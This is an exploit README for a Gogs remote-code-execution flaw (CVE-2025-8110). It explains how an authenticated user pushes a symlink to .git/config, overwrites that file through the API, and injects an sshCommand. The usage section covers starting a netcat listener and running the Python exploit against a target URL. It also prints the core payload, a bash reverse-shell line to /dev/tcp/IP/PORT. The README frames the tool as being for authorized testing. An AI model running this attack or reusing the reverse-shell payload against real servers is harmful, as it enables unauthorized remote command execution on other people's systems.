## https://sploitus.com/exploit?id=0A96A424-7501-5F3F-902B-ABCCA3120FFE
# Gogs RCE Exploit (CVE-2025-8110)



A Proof of Concept (PoC) for **CVE-2025-8110**, a critical vulnerability in Gogs that allows Remote Code Execution (RCE) via `.git/config` manipulation using symbolic link bypasses and `sshCommand` injection.
## ๐ Overview
This exploit targets a Path Traversal flaw in the Gogs API content management. An authenticated user can:
1. Create a repository and push a **symbolic link** pointing to the internal `.git/config`.
2. Use the API to overwrite the target config file via the symlink.
3. Inject a malicious `sshCommand` to execute a **Reverse Shell** when the server performs Git operations.
## ๐ Features
- **Automated Workflow**: Handles login, repo creation, symlink deployment, and poisoning.
- **Robust Encoding**: Automatically URL-encodes credentials to handle special characters (e.g., `!`, `@`).
- **Rich Output**: High-visibility logging using the `Rich` library.
## ๐ Prerequisites
- **Python 3.12+**
- **Git** installed on the local system.
- Valid credentials on the target Gogs instance.
## ๐ฆ Installation
1. Clone the repository:
```bash
git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
Install dependencies:
```Bash
pip3 install -r requirements.txt
```
๐ป Usage
Start your listener:
```bash
nc -lvnp 6666
```
Run the exploit:
```bash
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh -lp 6666 -p 'YourPassword123!'
```
Arguments:
| Argument | Description |
|---|---|
| `-u, --url` | Base URL of the target Gogs instance (e.g., `http://target.htb:3000`). |
| `-lh, --host` | Attacker IP (LHOST) where the reverse shell will connect back. |
| `-lp, --port` | Listener Port (LPORT) configured on your machine. |
| `-p, --password` | Password for the `pwnuser` account to perform authentication. |
| `-x, --proxy` | (Optional) Routes traffic through a local proxy (default: `http://localhost:8080`). |
#### Core of the vulnerability:
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
When Gogs executes a Git command that requires network transport (like a mirror sync or internal reference check), it invokes the sshCommand, triggering the reverse shell.
### โ ๏ธ Legal Disclaimer: This tool is for educational and authorized security testing purposes only. The author is not responsible for any misuse or damage caused by this script. Unauthorized access to computer systems is illegal.